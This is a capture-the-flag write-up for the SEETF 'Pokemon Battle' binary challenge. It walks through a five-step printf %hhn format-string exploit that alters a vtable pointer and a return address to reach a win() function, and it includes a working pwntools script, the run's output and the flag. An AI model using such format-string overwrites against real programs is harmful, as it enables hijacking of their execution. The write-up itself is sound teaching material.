# Solution for Pokemon Battle

_This challenge was born of a silly observation that `vtable` kind of looks a bit like `vbattle` if you're sufficiently high. And thus the theme was set in stone._

The stack is like:

| Top | Stack      | Description |
|--:| :--: | :--: |
|-->| -5   | Unused bytes for alignment|
|| -4   | Pointer to the `battler` object       |
|| -3   | Previous stack frame: i.e. points to `STACK[-1]`       |
|| -2   | Return address to `main()` from `Play()`        |
|-->| -1   | Some random preserved RBP    |
|| 0    | Return address: to `__libc_start_main()` from `main()` |

We solve this using only 5 input-eval iterations, by poking bytes into the stack via `printf` `%hhn` (which starts the top of the stack as arg6 since the five before that are registers).

| # | Instruction | Corresponding `printf` |
| -- | :-- | -- |
|1| Modify vtable at `STACK[-4]` from `0x3D68` to `0x3D70`, so that a call to `Battle()` redirects to `Play()`, causing more inputs. This adds 4 items to the stack each time (effectively duplicating the top 4 layers). | Poke byte 0x70 to arg7 |
|2| Read the value of `STACK[-3]`, so we know the absolute address of `STACK[-1]` (and the stack as a whole). | Read byte from arg12 |
|3| Modify value of `STACK[-3]` (pointed to by `STACK[-7]`), to subtract 8. This makes it point to `STACK[-2]` rather than `STACK[-1]`. | Poke byte (val-8) to arg12 |
|4| Modify return address at `STACK[-2]` (now pointed to by `STACK[-3]`) from `0x12B7` to `0x12C3`. This is basically the `win()` function, but just past the initial `push rbp` so that the stack is 16-byte aligned. | Poke byte 0xC3 to arg20 |
|5| Finally, revert the vtable back from `0x3D68` to `0x3D70`. | Poke byte 0x68 to arg7 |

This allows the game to visit `win()` after returning from all the `Play()`s, and then exit cleanly.

Since everything is ASCII, we can do this by hand on the command line, but for completeness we show it in pwntools below:

In [1]:
from pwn import *
with remote('fun.chall.seetf.sg', 50005) as sh:
    sh.sendline(b'%112c%7$hhn')
    sh.sendline(b'[%12$hhu')
    sh.recvuntil(b'[')
    pos = int(sh.recvuntil(b',', True))
    assert pos, 'Try again, this exploit requires non-zero pos'
    sh.sendline(f'%{pos-8}c%12$hhn'.encode())
    sh.sendline(b'%195c%20$hhn')
    sh.sendline(b'%104c%7$hhn')
    print(sh.recvall().decode())

[x] Opening connection to fun.chall.seetf.sg on port 50005
[x] Opening connection to fun.chall.seetf.sg on port 50005: Trying 34.131.197.225
[+] Opening connection to fun.chall.seetf.sg on port 50005: Done
[x] Receiving all data
[x] Receiving all data: 33B
[x] Receiving all data: 139B
[x] Receiving all data: 619B
[+] Receiving all data: Done (619B)
[*] Closed connection to fun.chall.seetf.sg port 50005
 I choose you!
Choose a pokemon:                                                                        
, I choose you!
Choose a pokemon:                                                                                                                                                                                                   
, I choose you!
Choose a pokemon: SEE{did_you_choose_missingno_b6d3c6594dcc332c7e22d231d10b8b8b}
                                                                                                       
, I choose you!
Let the battle begin...
Your pokemon was de

The order comes out a bit weird due to the buffering, but we can clearly see our flag in there:
```SEE{did_you_choose_missingno_b6d3c6594dcc332c7e22d231d10b8b8b}```